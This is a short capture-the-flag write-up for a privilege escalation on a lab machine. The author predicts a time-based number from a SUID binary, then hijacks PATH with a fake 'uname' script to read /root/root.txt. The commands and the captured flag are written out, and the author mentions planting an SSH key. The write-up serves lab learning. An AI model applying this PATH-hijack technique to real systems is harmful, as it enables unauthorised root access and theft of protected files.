This system architecture is x86_64
Using a relative path for uname -p
So we can do the exact same attack as in Archangel Root EoP.
But as the uname
execution occurs after the correct number has been found we need
to find a way to bypass that before.
The binary tell us the expected number if we fail and as it is using time
we execute the binary two time successively very quickly it will have the same
There is a hint telling us we can use pwntools
but I don't want to use it:
$ cat .python_history
import pwn
import pwn
With this pipeline we can retrieve the number from the 1st execution and inject it in the second:
echo 667 | /srv/time-turner/swagger | sed -n 2p | cut -d ' ' -f 5 | /srv/time-turner/swagger
The we can hijack the PATH:
$ TD=$(mktemp -d)
$ echo 'cat /root/root.txt' > "$TD/uname"
$ chmod a+x "$TD/uname"
$ export PATH=$TD:$PATH
$ echo 667 | /srv/time-turner/swagger | sed -n 2p | cut -d ' ' -f 5 | /srv/time-turner/swagger
Guess my number: Nice use of the time-turner!
This system architecture is RME{edietd}
Note: spawning a shell directly didn't work but it's possible to write a SSH key or do something more clever/uselful.